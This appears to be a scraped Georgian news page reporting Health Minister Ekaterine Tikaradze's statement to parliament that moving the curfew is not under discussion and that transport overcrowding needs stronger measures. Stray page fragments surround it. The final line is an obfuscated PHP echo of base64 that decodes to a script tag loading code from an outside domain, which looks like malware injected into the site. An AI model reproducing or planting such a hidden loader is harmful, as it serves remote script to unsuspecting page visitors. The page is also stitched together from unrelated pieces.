celsiusi
ავერსი შნაიდერი
ე.წ. კომენდანტის საათის წინ ან უკან გადაწევაზე საუბარი არ მიმდინარეობს, - ამის შესახებ ჯანდაცვის მინისტრმა ეკატერინე ტიკარაძემ პლენარულ სხდომაზე, „მინისტრის საათის“ ფორმატში გამოსვლისას განაცხადა.
 
მისივე თქმით, მნიშვნელოვანია, რომ ტრანსპორტის გადატვირთვასთან დაკავშირებით უფრო ქმედითი ნაბიჯები გადაიდგას.
 
„ტრანსპორტის გადატვირთვასთან დაკავშირებით, ნამდვილად ვთვლით, რომ ტრანსპორტი გადატვირთულია. ჩვენი სურვილია, რომ მუნიციპალურ ტრანსპორტსა და მეტროს შესაძლო რესურსი გაიზარდოს. თუმცა, ამ ეტაპისთვის ე.წ. კომენდანტის საათის წინ, ან უკან გადაწევაზე საუბარი არ მიმდინარეობს. მნიშვნელოვანია უფრო ქმედითი ნაბიჯები გადაიდგას ტრანსპორტის გადატვირთვასთან დაკავშირებით“, - განაცხადა ტიკარაძემ.
1112
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");